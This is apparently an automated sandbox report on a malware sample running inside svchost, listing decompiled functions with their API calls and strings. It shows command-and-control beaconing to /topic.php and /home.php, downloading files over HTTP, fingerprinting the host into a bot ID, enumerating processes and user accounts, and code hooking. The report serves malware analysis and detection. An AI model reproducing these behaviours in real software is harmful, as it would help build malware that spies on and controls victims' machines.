InternetCloseHandle.WININET(00000000), ref: 02C83D3A
InternetCloseHandle.WININET(00000000), ref: 02C83D44

Strings

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
325b0ba3454dc65e, xrefs: 02C83B22
POST, xrefs: 02C83ABD, 02C83AD3
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
GET, xrefs: 02C83AB6
Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
Referer: http://www.google.com, xrefs: 02C83B14
HTTP/1.0, xrefs: 02C83ACD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocateConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
String ID: 325b0ba3454dc65e$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 4276495747-3557604321
Opcode ID: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
Instruction ID: 03b87ba596479fec21a927c15e461ff520d988b86805412e4964db04f359d503
Opcode Fuzzy Hash: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
Instruction Fuzzy Hash: 8951B771A802847BEB219F50CC49FEB7B68EF84B18F104698FA05B71C0D7B0AA55CB65

Function 02C83695 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 173
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
_snprintf.MSVCRT ref: 02C8378E
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
HeapAlloc.KERNEL32(00000000), ref: 02C8382A
memset.MSVCRT ref: 02C83842
InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
HeapValidate.KERNEL32(00000000), ref: 02C8388C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
HeapFree.KERNEL32(00000000), ref: 02C8389C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
HeapValidate.KERNEL32(00000000), ref: 02C838AD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
HeapFree.KERNEL32(00000000), ref: 02C838BD
GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
CloseHandle.KERNEL32(00000000), ref: 02C838E4
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C8395F
HeapValidate.KERNEL32(00000000), ref: 02C83962
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8396F
HeapFree.KERNEL32(00000000), ref: 02C83972
InternetCloseHandle.WININET(00000000), ref: 02C8397C
InternetCloseHandle.WININET(00000000), ref: 02C83986
InternetCloseHandle.WININET(00000000), ref: 02C83990

Strings

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
325b0ba3454dc65e, xrefs: 02C83778
POST, xrefs: 02C8371C, 02C8372F
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
GET, xrefs: 02C83712
Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
Referer: http://www.google.com, xrefs: 02C8376B
HTTP/1.0, xrefs: 02C83729

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
String ID: 325b0ba3454dc65e$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 4235660723-3557604321
Opcode ID: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
Instruction ID: 14c700ebed10ca15fb36dad9405ebaab1b16be7677af05c9bd8b66d4237764b5
Opcode Fuzzy Hash: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
Instruction Fuzzy Hash: 5351A7719402847BEB219F54DC89FFB776CEF88B58F008658F905A71C0D7709A55CBA1

Function 02C73100 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 181memoryregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C73126

Part of subcall function 02C934A0: memset.MSVCRT ref: 02C934D3
Part of subcall function 02C934A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
Part of subcall function 02C934A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
Part of subcall function 02C934A0: memset.MSVCRT ref: 02C93501
Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
Part of subcall function 02C934A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
Part of subcall function 02C934A0: StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
Part of subcall function 02C934A0: lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A

Part of subcall function 02C935A0: memset.MSVCRT ref: 02C935D4
Part of subcall function 02C935A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C935E3
Part of subcall function 02C935A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C935EA
Part of subcall function 02C935A0: memset.MSVCRT ref: 02C93602
Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93619
Part of subcall function 02C935A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9361F
Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93640
Part of subcall function 02C935A0: StrChrIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000), ref: 02C93667
Part of subcall function 02C935A0: lstrcpynA.KERNEL32(00000000,00000001,00000104,?,00000000,00000000,?,?,?,?,00000000), ref: 02C9367B

GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76232F70,7736C3F0), ref: 02C73164
PathAddBackslashA.SHLWAPI(?,?,?,76232F70,7736C3F0), ref: 02C73171
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C73188
RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76232F70,7736C3F0), ref: 02C731AE
RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,02C8598D,?,?,?,76232F70,7736C3F0), ref: 02C731CF
RegCloseKey.ADVAPI32(?,?,?,76232F70,7736C3F0), ref: 02C731D9
CharUpperA.USER32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C731F4
CharUpperA.USER32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C731F8
_snprintf.MSVCRT ref: 02C73210
_snprintf.MSVCRT ref: 02C7326F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C7329E
HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732A7
GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732B3
HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732B6
GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732C6
HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732C9
GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732D5
HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732D8

Strings

Software\Microsoft\Windows NT\CurrentVersion, xrefs: 02C731A4
InstallDate, xrefs: 02C731C9
%02X, xrefs: 02C73261
%s!%s!%08X, xrefs: 02C73201
SystemDrive, xrefs: 02C7315F
%45%4E%47%49%4E%45%45%52%21%38%39%39%35%35%32%21%45%37%45%33%44%32%32%36, xrefs: 02C73230, 02C73245
user!899552!E7E3D226, xrefs: 02C73118, 02C7320B, 02C73212, 02C73271

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
String ID: %02X$%45%4E%47%49%4E%45%45%52%21%38%39%39%35%35%32%21%45%37%45%33%44%32%32%36$%s!%s!%08X$user!899552!E7E3D226$InstallDate$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
API String ID: 3299431409-6769214
Opcode ID: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
Instruction ID: 75e312b9e7ffe3699f6f3bebc38541af77f4571995b644781dfedd3aa8380b83
Opcode Fuzzy Hash: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
Instruction Fuzzy Hash: 9A51C6B1E40295ABDB11CBA59C89FEBBBBCEF84704F0445D5E905E7141E7709A048BA0

Function 02C88DD0 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 02C88DF6
GetThreadPriority.KERNEL32(00000000,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88DFD
GetTickCount.KERNEL32 ref: 02C88E06
VirtualProtect.KERNEL32(02C890E0,00000008,00000040,?,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C88E27
VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02C88E46
VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02C88E62
InterlockedExchange.KERNEL32(00000000,00000004), ref: 02C88E78
InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02C88E86
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88E91
InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02C88EA4
InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02C88EB5
InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02C88EC4
InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02C88ED3
InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02C88EE2
InterlockedExchange.KERNEL32(00000006,?), ref: 02C88EEA
InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02C88EFD
InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02C88F0E
InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02C88F1D
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88F29
VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02C88F33
GetCurrentThread.KERNEL32 ref: 02C88F3B
SetThreadPriority.KERNEL32(00000000), ref: 02C88F42
GetCurrentThread.KERNEL32 ref: 02C88F7E
SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
String ID:
API String ID: 2984368831-0
Opcode ID: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
Instruction ID: f67128f16ff17653a9e34e1d7b9161699e35eac166b0b198bcee514057c584d9
Opcode Fuzzy Hash: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
Instruction Fuzzy Hash: 13517371941219EFE711AF74CC46FAE77ACFF49310F154928F986E3180DB3899518BA0

Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
CloseHandle.KERNEL32(00000000), ref: 0040222A

Strings

m, xrefs: 004021E2
e, xrefs: 0040216B
\\.\KmxAgent, xrefs: 004020C8
", xrefs: 0040215A
0, xrefs: 004021BF
4, xrefs: 004021B8
d, xrefs: 00402153
t, xrefs: 004021E9
D, xrefs: 004021B1
t, xrefs: 004021D4
S, xrefs: 00402195
m, xrefs: 004021CD
E, xrefs: 0040219C
T, xrefs: 004021AA
g, xrefs: 00402179
E, xrefs: 004021A3
s, xrefs: 00402172
", xrefs: 00402187

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55

Function 02C743E0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 199memoryprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C74413
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,762335B0,00000000), ref: 02C7441E
Process32First.KERNEL32 ref: 02C74441
GetHandleInformation.KERNEL32(00000000,?), ref: 02C7445D
CloseHandle.KERNEL32(00000000), ref: 02C74477
GetProcessHeap.KERNEL32(00000008,?), ref: 02C744B0
HeapAlloc.KERNEL32(00000000), ref: 02C744B7
memset.MSVCRT ref: 02C744CB
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02C744FC
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02C74513
_snprintf.MSVCRT ref: 02C7457C
Process32Next.KERNEL32(?,?), ref: 02C7458B

Strings

%d%s, xrefs: 02C74573
[System Process], xrefs: 02C7452B
taskmgr{PIDProcess name, xrefs: 02C743F4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
String ID: %d%s$[System Process]$taskmgr{PIDProcess name
API String ID: 3808533164-4214784430
Opcode ID: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
Instruction ID: a58d1df14372a35efa8db0775b27ced9be746b89a85be76ce4bc9d0dd6485024
Opcode Fuzzy Hash: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
Instruction Fuzzy Hash: 5661E171A44381AFD326DB24D848FA7BBF9EFC4704F048A58F89587240E770D608CBA2

Function 02C96C70 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
GetFileInformationByHandle.KERNEL32(?,?), ref: 02C96C96

Strings

D0<, xrefs: 02C96D85, 02C96D9D, 02C96DCA, 02C96D88, 02C96DA0, 02C96DCD
D0<, xrefs: 02C96E0B, 02C96E2D, 02C96E43, 02C96E30
,D0<, xrefs: 02C96E12
,D0<, xrefs: 02C96E17

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleInformationType
String ID: ,D0<$,D0<$D0<$D0<
API String ID: 4064226416-1748840775
Opcode ID: 4837e2ca51a3dc12170bb28ce22d2c1c9feb5f4725421d38bfecf30f5d924a9d
Instruction ID: 7f8221c318e4143dce0d053032e39b27c28f664beaf338886061e0b2e7157856
Opcode Fuzzy Hash: 4837e2ca51a3dc12170bb28ce22d2c1c9feb5f4725421d38bfecf30f5d924a9d
Instruction Fuzzy Hash: ED516F72D40218ABDF14CFA9DC89BBEBB7CEB84700F244569E915EB1C0D774AA40CB95

Function 02C759E0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C75A50
memset.MSVCRT ref: 02C75A6A
memset.MSVCRT ref: 02C75A84
strtol.MSVCRT ref: 02C75AFA
strstr.MSVCRT ref: 02C75B7A

Strings

eyuioa, xrefs: 02C75A0F
%s%s, xrefs: 02C75C61
qwrtpsdfghjklzxcvbnm, xrefs: 02C759E9
1676d5775e05c50b46baa5579d4fc7, xrefs: 02C75AA4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset$strstrstrtol
String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
API String ID: 600650289-3097137778
Opcode ID: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
Instruction ID: da856dfcd850f2cb1d291f491d62d00feefe61db9d72616daca149179db0e07f
Opcode Fuzzy Hash: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
Instruction Fuzzy Hash: E7719E71E482599BDB26CB78AC90BDEBBB5EF48300F0445E8ED49E3281D3705B45CBA1

Function 02C82410 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 149memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C82431
memset.MSVCRT ref: 02C8244C
GetTempPathA.KERNEL32(00000104,?,?,?,?,76230F00,00000000,00000000), ref: 02C82466
GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,76230F00,00000000,00000000), ref: 02C8247C

Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,7D2DE31Fa,00000000,00000001,?,00000104), ref: 02C762D2
Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76230F00,00000000,00000000), ref: 02C824CB
HeapValidate.KERNEL32(00000000,?,?,?,76230F00,00000000,00000000), ref: 02C824D2
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76230F00,00000000,00000000), ref: 02C824DE
HeapFree.KERNEL32(00000000,?,?,?,76230F00,00000000,00000000), ref: 02C824E5
SetFileAttributesA.KERNEL32(?,00000000,00000001,00000001,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,76230F00), ref: 02C82539
DeleteFileA.KERNEL32(?,?,?,?,76230F00,00000000,00000000), ref: 02C82546
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76230F00,00000000,00000000), ref: 02C82584
HeapValidate.KERNEL32(00000000,?,?,?,76230F00,00000000,00000000), ref: 02C82587
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76230F00,00000000,00000000), ref: 02C82593
HeapFree.KERNEL32(00000000,?,?,?,76230F00,00000000,00000000), ref: 02C82596

Strings

/topic.php, xrefs: 02C82507

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
String ID: /topic.php
API String ID: 870369024-224703247
Opcode ID: a454c440bb8eed63a1394de1c136b9f8726c41ba902644c2b30aa70d9e561112
Instruction ID: 859b79327cd0db00b4ba6194f57fb873a6453a7128b419a7423951229dc9266e
Opcode Fuzzy Hash: a454c440bb8eed63a1394de1c136b9f8726c41ba902644c2b30aa70d9e561112
Instruction Fuzzy Hash: B9414C72D801986FCB21EF749C9CEEABBADEF84304F048995F945D3141D6718B44CBA1

Function 02C88C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 111filethreadCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C88C7A
PathAddBackslashA.SHLWAPI(?), ref: 02C88C87
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02C88CA4
CreateThread.KERNEL32(00000000,00000000,Function_000188F0,?,00000000,00000000), ref: 02C88CED
GetHandleInformation.KERNEL32(00000000,?), ref: 02C88D05
CloseHandle.KERNEL32(00000000), ref: 02C88D16
GetTempPathA.KERNEL32(00000104,?), ref: 02C88D28
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C88D40
_snprintf.MSVCRT ref: 02C88D60
SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C88DAA
DeleteFileA.KERNEL32(?), ref: 02C88DB7

Strings

SystemDrive, xrefs: 02C88C75
%45%4E%47%49%4E%45%45%52%21%38%39%39%35%35%32%21%45%37%45%33%44%32%32%36, xrefs: 02C88D4A
/home.php, xrefs: 02C88D91
name=%s&port=%u, xrefs: 02C88D4F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
String ID: %45%4E%47%49%4E%45%45%52%21%38%39%39%35%35%32%21%45%37%45%33%44%32%32%36$/home.php$SystemDrive$name=%s&port=%u
API String ID: 1291007772-768100762
Opcode ID: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
Instruction ID: 19e462e9301785fa3939d799fcd2f6b6f711ed7f5f2997c3c6809450ae5e9672
Opcode Fuzzy Hash: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
Instruction Fuzzy Hash: 1E419571A80249BFEB15EB60CC49FE9777DEF84704F0086D4B605A7180EBB09B448BA0

Function 02C74630 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 158memoryfileCOMMON

Download Yara Rule

APIs

NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,762335B0,00000000,?,?,?,?,02C74FC0,00000000), ref: 02C74677
GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746BD
HeapAlloc.KERNEL32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746C4
memset.MSVCRT ref: 02C746D7
_snprintf.MSVCRT ref: 02C7471D
NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000), ref: 02C74754
WriteFile.KERNEL32(00000000,02C74FC0,02C74FC1,000000EA,00000000), ref: 02C7478C
GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C7479F
HeapValidate.KERNEL32(00000000), ref: 02C747A2
GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C747AF
HeapFree.KERNEL32(00000000), ref: 02C747B2
NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C747C5

Strings

%S, xrefs: 02C74714
netuser{, xrefs: 02C74636

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
